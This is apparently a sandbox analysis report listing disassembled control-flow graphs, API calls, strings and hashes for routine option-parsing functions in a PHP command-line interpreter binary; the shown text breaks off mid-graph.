7ff7498c1010 __acrt_iob_func fflush 251->253 254 7ff7498c23e6-7ff7498c23ea 251->254 273 7ff7498c24c2 253->273 261 7ff7498c24c6-7ff7498c24c9 254->261 255->256 262 7ff7498c2342-7ff7498c234f 255->262 256->245 263 7ff7498c2441-7ff7498c2446 257->263 264 7ff7498c2438-7ff7498c243b free 257->264 258->257 268 7ff7498c2506-7ff7498c2509 261->268 269 7ff7498c24cb-7ff7498c24ce 261->269 262->244 270 7ff7498c2351-7ff7498c2355 262->270 265 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 263->265 266 7ff7498c244c-7ff7498c2455 _getpid 263->266 264->263 266->265 271 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 266->271 275 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 268->275 277 7ff7498c2588-7ff7498c259a 268->277 274 7ff7498c24d0-7ff7498c24d7 269->274 269->275 270->244 276 7ff7498c2357-7ff7498c235b 270->276 271->273 273->261 274->268 282 7ff7498c24d9-7ff7498c24e6 274->282 283 7ff7498c2526-7ff7498c2536 php_printf 275->283 284 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 275->284 276->244 276->256 279 7ff7498c25c5-7ff7498c264f php_request_startup 277->279 280 7ff7498c259c-7ff7498c259f 277->280 289 7ff7498c2651-7ff7498c2664 php_output_write 279->289 290 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 279->290 280->279 288 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 280->288 291 7ff7498c24f4-7ff7498c2502 282->291 292 7ff7498c24e8-7ff7498c24ec 282->292 293 7ff7498c266a 283->293 285 7ff7498c2564-7ff7498c2574 _strdup 284->285 286 7ff7498c2578-7ff7498c2586 284->286 285->286 294 7ff7498c25c1 286->294 288->294 289->293 296 7ff7498c273b-7ff7498c2773 zend_is_auto_global 290->296 297 7ff7498c26fb-7ff7498c26ff 290->297 291->268 292->291 295 7ff7498c24ee-7ff7498c24f2 292->295 293->246 294->279 295->268 295->291 298 7ff7498c23ef-7ff7498c2406 296->298 299 7ff7498c2779-7ff7498c2789 296->299 297->296 300 7ff7498c2701-7ff7498c2709 297->300 298->242 299->265 302 7ff7498c2710-7ff7498c271a 300->302 303 7ff7498c2720-7ff7498c2728 302->303 303->303 304 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 303->304 304->296 304->302
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -R or -F only once.
                                                • API String ID: 3553338152-583370466
                                                • Opcode ID: 228b9956463f1bd849c5d356d7df22da3886abecfbf20f55fd4de07cdbb12e31
                                                • Instruction ID: 3ff49e7269127500e06dd498396f66df8ae9edb5bcb0f47a123a1dc49123ad1e
                                                • Opcode Fuzzy Hash: 228b9956463f1bd849c5d356d7df22da3886abecfbf20f55fd4de07cdbb12e31
                                                • Instruction Fuzzy Hash: 9F61F432A0CB46C6EB50BF29E444269E7B8FB44B94F944536DA4E437A8CF3CE464C720
                                                Function 00007FF7498C2048 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 134COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 307 7ff7498c2048-7ff7498c204c 308 7ff7498c204e-7ff7498c2053 307->308 309 7ff7498c206b-7ff7498c206f 307->309 310 7ff7498c2055-7ff7498c2058 308->310 311 7ff7498c205a-7ff7498c2066 308->311 312 7ff7498c2075-7ff7498c2078 309->312 313 7ff7498c2167-7ff7498c2173 309->313 310->311 314 7ff7498c207e-7ff7498c2092 310->314 315 7ff7498c2275-7ff7498c22b6 php_getopt 311->315 312->313 312->314 313->315 314->313 314->315 316 7ff7498c1d80-7ff7498c1d86 315->316 317 7ff7498c22bc-7ff7498c22de 315->317 316->315 318 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 316->318 320 7ff7498c22e0 317->320 321 7ff7498c231c-7ff7498c231f 317->321 327 7ff7498c240e-7ff7498c2413 318->327 322 7ff7498c22e7-7ff7498c22ee 320->322 324 7ff7498c2321-7ff7498c232d php_win32_console_is_own 321->324 325 7ff7498c237b 321->325 322->322 326 7ff7498c22f0-7ff7498c2317 php_output_write 322->326 328 7ff7498c232f-7ff7498c2332 324->328 329 7ff7498c236c-7ff7498c2379 324->329 330 7ff7498c237f-7ff7498c2382 325->330 331 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 326->331 333 7ff7498c241f-7ff7498c2425 327->333 334 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 327->334 328->329 332 7ff7498c2334-7ff7498c2337 328->332 329->330 335 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 330->335 336 7ff7498c23a8-7ff7498c23ad 330->336 331->327 340 7ff7498c2339-7ff7498c2340 332->340 341 7ff7498c235d-7ff7498c236a 332->341 342 7ff7498c242f-7ff7498c2436 333->342 343 7ff7498c2427-7ff7498c2429 php_request_shutdown 333->343 334->333 335->336 338 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 336->338 339 7ff7498c23e6-7ff7498c23ea 336->339 358 7ff7498c24c2 338->358 346 7ff7498c24c6-7ff7498c24c9 339->346 340->341 347 7ff7498c2342-7ff7498c234f 340->347 341->330 348 7ff7498c2441-7ff7498c2446 342->348 349 7ff7498c2438-7ff7498c243b free 342->349 343->342 353 7ff7498c2506-7ff7498c2509 346->353 354 7ff7498c24cb-7ff7498c24ce 346->354 347->329 355 7ff7498c2351-7ff7498c2355 347->355 350 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 348->350 351 7ff7498c244c-7ff7498c2455 _getpid 348->351 349->348 351->350 356 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 351->356 360 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 353->360 362 7ff7498c2588-7ff7498c259a 353->362 359 7ff7498c24d0-7ff7498c24d7 354->359 354->360 355->329 361 7ff7498c2357-7ff7498c235b 355->361 356->358 358->346 359->353 367 7ff7498c24d9-7ff7498c24e6 359->367 368 7ff7498c2526-7ff7498c2536 php_printf 360->368 369 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 360->369 361->329 361->341 364 7ff7498c25c5-7ff7498c264f php_request_startup 362->364 365 7ff7498c259c-7ff7498c259f 362->365 374 7ff7498c2651-7ff7498c2664 php_output_write 364->374 375 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 364->375 365->364 373 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 365->373 376 7ff7498c24f4-7ff7498c2502 367->376 377 7ff7498c24e8-7ff7498c24ec 367->377 378 7ff7498c266a 368->378 370 7ff7498c2564-7ff7498c2574 _strdup 369->370 371 7ff7498c2578-7ff7498c2586 369->371 370->371 379 7ff7498c25c1 371->379 373->379 374->378 381 7ff7498c273b-7ff7498c2773 zend_is_auto_global 375->381 382 7ff7498c26fb-7ff7498c26ff 375->382 376->353 377->376 380 7ff7498c24ee-7ff7498c24f2 377->380 378->331 379->364 380->353 380->376 383 7ff7498c23ef-7ff7498c2406 381->383 384 7ff7498c2779-7ff7498c2789 381->384 382->381 385 7ff7498c2701-7ff7498c2709 382->385 383->327 384->350 387 7ff7498c2710-7ff7498c271a 385->387 388 7ff7498c2720-7ff7498c2728 387->388 388->388 389 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 388->389 389->381 389->387
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -r only once.
                                                • API String ID: 3553338152-426040128
                                                • Opcode ID: d858a1e9502a77dbd96d191ea617b3bad5ef68b13e962244e103bb3bce0c4c19
                                                • Instruction ID: 62748c2835e93224e59e4677b39c42c418d5555a7c98f9da323c08c5ceeb1839
                                                • Opcode Fuzzy Hash: d858a1e9502a77dbd96d191ea617b3bad5ef68b13e962244e103bb3bce0c4c19
                                                • Instruction Fuzzy Hash: 6C61F632A0CB46C6EB50BF69E444269B7B8FB44B94F940536DA4E437A8CF3CE464C720
                                                Function 00007FF7498C2097 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 133COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 392 7ff7498c2097-7ff7498c209b 393 7ff7498c20b8-7ff7498c20bc 392->393 394 7ff7498c209d-7ff7498c20a0 392->394 397 7ff7498c20c2-7ff7498c20da 393->397 398 7ff7498c2167-7ff7498c2173 393->398 395 7ff7498c20a2-7ff7498c20a5 394->395 396 7ff7498c20a7-7ff7498c20b3 394->396 395->396 395->397 399 7ff7498c2275-7ff7498c22b6 php_getopt 396->399 397->398 397->399 398->399 400 7ff7498c1d80-7ff7498c1d86 399->400 401 7ff7498c22bc-7ff7498c22de 399->401 400->399 402 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 400->402 404 7ff7498c22e0 401->404 405 7ff7498c231c-7ff7498c231f 401->405 411 7ff7498c240e-7ff7498c2413 402->411 406 7ff7498c22e7-7ff7498c22ee 404->406 408 7ff7498c2321-7ff7498c232d php_win32_console_is_own 405->408 409 7ff7498c237b 405->409 406->406 410 7ff7498c22f0-7ff7498c2317 php_output_write 406->410 412 7ff7498c232f-7ff7498c2332 408->412 413 7ff7498c236c-7ff7498c2379 408->413 414 7ff7498c237f-7ff7498c2382 409->414 415 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 410->415 417 7ff7498c241f-7ff7498c2425 411->417 418 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 411->418 412->413 416 7ff7498c2334-7ff7498c2337 412->416 413->414 419 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 414->419 420 7ff7498c23a8-7ff7498c23ad 414->420 415->411 424 7ff7498c2339-7ff7498c2340 416->424 425 7ff7498c235d-7ff7498c236a 416->425 426 7ff7498c242f-7ff7498c2436 417->426 427 7ff7498c2427-7ff7498c2429 php_request_shutdown 417->427 418->417 419->420 422 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 420->422 423 7ff7498c23e6-7ff7498c23ea 420->423 442 7ff7498c24c2 422->442 430 7ff7498c24c6-7ff7498c24c9 423->430 424->425 431 7ff7498c2342-7ff7498c234f 424->431 425->414 432 7ff7498c2441-7ff7498c2446 426->432 433 7ff7498c2438-7ff7498c243b free 426->433 427->426 437 7ff7498c2506-7ff7498c2509 430->437 438 7ff7498c24cb-7ff7498c24ce 430->438 431->413 439 7ff7498c2351-7ff7498c2355 431->439 434 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 432->434 435 7ff7498c244c-7ff7498c2455 _getpid 432->435 433->432 435->434 440 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 435->440 444 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 437->444 446 7ff7498c2588-7ff7498c259a 437->446 443 7ff7498c24d0-7ff7498c24d7 438->443 438->444 439->413 445 7ff7498c2357-7ff7498c235b 439->445 440->442 442->430 443->437 451 7ff7498c24d9-7ff7498c24e6 443->451 452 7ff7498c2526-7ff7498c2536 php_printf 444->452 453 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 444->453 445->413 445->425 448 7ff7498c25c5-7ff7498c264f php_request_startup 446->448 449 7ff7498c259c-7ff7498c259f 446->449 458 7ff7498c2651-7ff7498c2664 php_output_write 448->458 459 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 448->459 449->448 457 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 449->457 460 7ff7498c24f4-7ff7498c2502 451->460 461 7ff7498c24e8-7ff7498c24ec 451->461 462 7ff7498c266a 452->462 454 7ff7498c2564-7ff7498c2574 _strdup 453->454 455 7ff7498c2578-7ff7498c2586 453->455 454->455 463 7ff7498c25c1 455->463 457->463 458->462 465 7ff7498c273b-7ff7498c2773 zend_is_auto_global 459->465 466 7ff7498c26fb-7ff7498c26ff 459->466 460->437 461->460 464 7ff7498c24ee-7ff7498c24f2 461->464 462->415 463->448 464->437 464->460 467 7ff7498c23ef-7ff7498c2406 465->467 468 7ff7498c2779-7ff7498c2789 465->468 466->465 469 7ff7498c2701-7ff7498c2709 466->469 467->411 468->434 471 7ff7498c2710-7ff7498c271a 469->471 472 7ff7498c2720-7ff7498c2728 471->472 472->472 473 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 472->473 473->465 473->471
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -R or -F only once.
                                                • API String ID: 3553338152-583370466
                                                • Opcode ID: 4eb3016f1b95f130a918f8364729c8162616cdff1726098edc066fbf7d43bfa0
                                                • Instruction ID: beac5c0a60257f04c78c224d1d662662fb3531d231667d4689b2bddf219e7827
                                                • Opcode Fuzzy Hash: 4eb3016f1b95f130a918f8364729c8162616cdff1726098edc066fbf7d43bfa0
                                                • Instruction Fuzzy Hash: AB610632A0CB46C6EB50BF69E444269B7B8FB44B94F944536DA4E437A8CF3CE464C720
                                                Function 00007FF7498C20DF Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 133COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 476 7ff7498c20df-7ff7498c20e3 477 7ff7498c20e5-7ff7498c20e8 476->477 478 7ff7498c20fb-7ff7498c20ff 476->478 479 7ff7498c2106-7ff7498c211e 477->479 480 7ff7498c20ea-7ff7498c20f6 477->480 481 7ff7498c2101-7ff7498c2104 478->481 482 7ff7498c2167-7ff7498c2173 478->482 479->482 483 7ff7498c2275-7ff7498c22b6 php_getopt 479->483 480->483 481->479 481->482 482->483 484 7ff7498c1d80-7ff7498c1d86 483->484 485 7ff7498c22bc-7ff7498c22de 483->485 484->483 486 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 484->486 488 7ff7498c22e0 485->488 489 7ff7498c231c-7ff7498c231f 485->489 495 7ff7498c240e-7ff7498c2413 486->495 490 7ff7498c22e7-7ff7498c22ee 488->490 492 7ff7498c2321-7ff7498c232d php_win32_console_is_own 489->492 493 7ff7498c237b 489->493 490->490 494 7ff7498c22f0-7ff7498c2317 php_output_write 490->494 496 7ff7498c232f-7ff7498c2332 492->496 497 7ff7498c236c-7ff7498c2379 492->497 498 7ff7498c237f-7ff7498c2382 493->498 499 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 494->499 501 7ff7498c241f-7ff7498c2425 495->501 502 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 495->502 496->497 500 7ff7498c2334-7ff7498c2337 496->500 497->498 503 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 498->503 504 7ff7498c23a8-7ff7498c23ad 498->504 499->495 508 7ff7498c2339-7ff7498c2340 500->508 509 7ff7498c235d-7ff7498c236a 500->509 510 7ff7498c242f-7ff7498c2436 501->510 511 7ff7498c2427-7ff7498c2429 php_request_shutdown 501->511 502->501 503->504 506 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 504->506 507 7ff7498c23e6-7ff7498c23ea 504->507 526 7ff7498c24c2 506->526 514 7ff7498c24c6-7ff7498c24c9 507->514 508->509 515 7ff7498c2342-7ff7498c234f 508->515 509->498 516 7ff7498c2441-7ff7498c2446 510->516 517 7ff7498c2438-7ff7498c243b free 510->517 511->510 521 7ff7498c2506-7ff7498c2509 514->521 522 7ff7498c24cb-7ff7498c24ce 514->522 515->497 523 7ff7498c2351-7ff7498c2355 515->523 518 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 516->518 519 7ff7498c244c-7ff7498c2455 _getpid 516->519 517->516 519->518 524 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 519->524 528 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 521->528 530 7ff7498c2588-7ff7498c259a 521->530 527 7ff7498c24d0-7ff7498c24d7 522->527 522->528 523->497 529 7ff7498c2357-7ff7498c235b 523->529 524->526 526->514 527->521 535 7ff7498c24d9-7ff7498c24e6 527->535 536 7ff7498c2526-7ff7498c2536 php_printf 528->536 537 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 528->537 529->497 529->509 532 7ff7498c25c5-7ff7498c264f php_request_startup 530->532 533 7ff7498c259c-7ff7498c259f 530->533 542 7ff7498c2651-7ff7498c2664 php_output_write 532->542 543 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 532->543 533->532 541 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 533->541 544 7ff7498c24f4-7ff7498c2502 535->544 545 7ff7498c24e8-7ff7498c24ec 535->545 546 7ff7498c266a 536->546 538 7ff7498c2564-7ff7498c2574 _strdup 537->538 539 7ff7498c2578-7ff7498c2586 537->539 538->539 547 7ff7498c25c1 539->547 541->547 542->546 549 7ff7498c273b-7ff7498c2773 zend_is_auto_global 543->549 550 7ff7498c26fb-7ff7498c26ff 543->550 544->521 545->544 548 7ff7498c24ee-7ff7498c24f2 545->548 546->499 547->532 548->521 548->544 551 7ff7498c23ef-7ff7498c2406 549->551 552 7ff7498c2779-7ff7498c2789 549->552 550->549 553 7ff7498c2701-7ff7498c2709 550->553 551->495 552->518 555 7ff7498c2710-7ff7498c271a 553->555 556 7ff7498c2720-7ff7498c2728 555->556 556->556 557 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 556->557 557->549 557->555
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -B only once.
                                                • API String ID: 3553338152-505230959
                                                • Opcode ID: 0e10afefe438f06696547d0fbb4cf1a3cda0f398d36f10d9a67720a2f4a0b730
                                                • Instruction ID: 8026ea72d06633134997deb20648ba5d280510858825c21cf750969305f4f5dd
                                                • Opcode Fuzzy Hash: 0e10afefe438f06696547d0fbb4cf1a3cda0f398d36f10d9a67720a2f4a0b730
                                                • Instruction Fuzzy Hash: 6261F632A0CB46C6EB50BF29E444269B7B8FB44B94F944536DA4E437A8CF3CE464C720
                                                Function 00007FF7498C2123 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 133COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 560 7ff7498c2123-7ff7498c2127 561 7ff7498c213f-7ff7498c2143 560->561 562 7ff7498c2129-7ff7498c212c 560->562 565 7ff7498c2145-7ff7498c2148 561->565 566 7ff7498c2167-7ff7498c2173 561->566 563 7ff7498c214a-7ff7498c2162 562->563 564 7ff7498c212e-7ff7498c213a 562->564 567 7ff7498c2275-7ff7498c22b6 php_getopt 563->567 564->567 565->563 565->566 566->567 568 7ff7498c1d80-7ff7498c1d86 567->568 569 7ff7498c22bc-7ff7498c22de 567->569 568->567 570 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 568->570 572 7ff7498c22e0 569->572 573 7ff7498c231c-7ff7498c231f 569->573 579 7ff7498c240e-7ff7498c2413 570->579 574 7ff7498c22e7-7ff7498c22ee 572->574 576 7ff7498c2321-7ff7498c232d php_win32_console_is_own 573->576 577 7ff7498c237b 573->577 574->574 578 7ff7498c22f0-7ff7498c2317 php_output_write 574->578 580 7ff7498c232f-7ff7498c2332 576->580 581 7ff7498c236c-7ff7498c2379 576->581 582 7ff7498c237f-7ff7498c2382 577->582 583 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 578->583 585 7ff7498c241f-7ff7498c2425 579->585 586 7ff7498c2415-7ff7498c2419 zend_destroy_file_handle 579->586 580->581 584 7ff7498c2334-7ff7498c2337 580->584 581->582 587 7ff7498c2384-7ff7498c23a4 call 7ff7498c1060 __acrt_iob_func fflush 582->587 588 7ff7498c23a8-7ff7498c23ad 582->588 583->579 592 7ff7498c2339-7ff7498c2340 584->592 593 7ff7498c235d-7ff7498c236a 584->593 594 7ff7498c242f-7ff7498c2436 585->594 595 7ff7498c2427-7ff7498c2429 php_request_shutdown 585->595 586->585 587->588 590 7ff7498c23af-7ff7498c23e1 __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 588->590 591 7ff7498c23e6-7ff7498c23ea 588->591 610 7ff7498c24c2 590->610 598 7ff7498c24c6-7ff7498c24c9 591->598 592->593 599 7ff7498c2342-7ff7498c234f 592->599 593->582 600 7ff7498c2441-7ff7498c2446 594->600 601 7ff7498c2438-7ff7498c243b free 594->601 595->594 605 7ff7498c2506-7ff7498c2509 598->605 606 7ff7498c24cb-7ff7498c24ce 598->606 599->581 607 7ff7498c2351-7ff7498c2355 599->607 602 7ff7498c2f15-7ff7498c2f53 call 7ff7498cbc30 600->602 603 7ff7498c244c-7ff7498c2455 _getpid 600->603 601->600 603->602 608 7ff7498c245b-7ff7498c24bd __acrt_iob_func call 7ff7498c1010 __acrt_iob_func fflush 603->608 612 7ff7498c250b-7ff7498c2524 virtual_cwd_activate virtual_fopen 605->612 614 7ff7498c2588-7ff7498c259a 605->614 611 7ff7498c24d0-7ff7498c24d7 606->611 606->612 607->581 613 7ff7498c2357-7ff7498c235b 607->613 608->610 610->598 611->605 619 7ff7498c24d9-7ff7498c24e6 611->619 620 7ff7498c2526-7ff7498c2536 php_printf 612->620 621 7ff7498c253b-7ff7498c2562 zend_stream_init_fp virtual_realpath 612->621 613->581 613->593 616 7ff7498c25c5-7ff7498c264f php_request_startup 614->616 617 7ff7498c259c-7ff7498c259f 614->617 626 7ff7498c2651-7ff7498c2664 php_output_write 616->626 627 7ff7498c2699-7ff7498c26f9 zend_register_bool_constant 616->627 617->616 625 7ff7498c25a1-7ff7498c25bd __acrt_iob_func zend_stream_init_fp 617->625 628 7ff7498c24f4-7ff7498c2502 619->628 629 7ff7498c24e8-7ff7498c24ec 619->629 630 7ff7498c266a 620->630 622 7ff7498c2564-7ff7498c2574 _strdup 621->622 623 7ff7498c2578-7ff7498c2586 621->623 622->623 631 7ff7498c25c1 623->631 625->631 626->630 633 7ff7498c273b-7ff7498c2773 zend_is_auto_global 627->633 634 7ff7498c26fb-7ff7498c26ff 627->634 628->605 629->628 632 7ff7498c24ee-7ff7498c24f2 629->632 630->583 631->616 632->605 632->628 635 7ff7498c23ef-7ff7498c2406 633->635 636 7ff7498c2779-7ff7498c2789 633->636 634->633 637 7ff7498c2701-7ff7498c2709 634->637 635->579 636->602 639 7ff7498c2710-7ff7498c271a 637->639 640 7ff7498c2720-7ff7498c2728 639->640 640->640 641 7ff7498c272a-7ff7498c2739 call 7ff7498cc942 640->641 641->633 641->639
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000018.00000002.2894832736.00007FF7498C1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF7498C0000, based on PE: true
                                                • Associated: 00000018.00000002.2894785645.00007FF7498C0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2894913708.00007FF7498CD000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895019683.00007FF7498E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                • Associated: 00000018.00000002.2895069671.00007FF7498E4000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_24_2_7ff7498c0000_php.jbxd
                                                Similarity
                                                • API ID: __acrt_iob_func$_getpidfflushfprintffreephp_getoptphp_output_writephp_request_shutdownsapi_deactivatezend_destroy_file_handlezend_ini_deactivate
                                                • String ID: Could not open input file: %s$Either execute direct code, process stdin or use a file.$Finished execution, repeating...$You can use -E only once.
                                                • API String ID: 3553338152-1668165687
                                                • Opcode ID: f75afcbd25c8002cd9d8841d2902f676d7587855860ac2f9678be31f560aebe2
                                                • Instruction ID: 8078ea3fbbcdf1952b023d645ecf158760e98bd7415e43da918100071e522426
                                                • Opcode Fuzzy Hash: f75afcbd25c8002cd9d8841d2902f676d7587855860ac2f9678be31f560aebe2
                                                • Instruction Fuzzy Hash: BB610732A0CB46C6EB50BF69E444269B7B8FB44B94F940536DA4E437A8CF3CE464C720
                                                Function 00007FF7498C1F86 Relevance: 33.4, APIs: 15, Strings: 4, Instructions: 128COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 644 7ff7498c1f86-7ff7498c1f8e 645 7ff7498c1fa1-7ff7498c1fa4 644->645 646 7ff7498c1f90-7ff7498c1f9c 644->646 647 7ff7498c2275-7ff7498c22b6 php_getopt 645->647 648 7ff7498c1faa-7ff7498c1fae 645->648 646->647 651 7ff7498c1d80-7ff7498c1d86 647->651 652 7ff7498c22bc-7ff7498c22de 647->652 649 7ff7498c1fb4-7ff7498c1fbd 648->649 650 7ff7498c2167-7ff7498c2173 648->650 649->647 649->650 650->647 651->647 653 7ff7498c1d8c-7ff7498c1df6 get_zend_version php_printf sapi_deactivate 651->653 655 7ff7498c22e0 652->655 656 7ff7498c231c-7ff7498c231f 652->656 662 7ff7498c240e-7ff7498c2413 653->662 657 7ff7498c22e7-7ff7498c22ee 655->657 659 7ff7498c2321-7ff7498c232d php_win32_console_is_own 656->659 660 7ff7498c237b 656->660 657->657 661 7ff7498c22f0-7ff7498c2317 php_output_write 657->661 663 7ff7498c232f-7ff7498c2332 659->663 664 7ff7498c236c-7ff7498c2379 659->664 665 7ff7498c237f-7ff7498c2382 660->665 666 7ff7498c266f-7ff7498c2694 sapi_deactivate zend_ini_deactivate 661->666 668 7ff7498c241f-7ff7498c2425 662->668 669 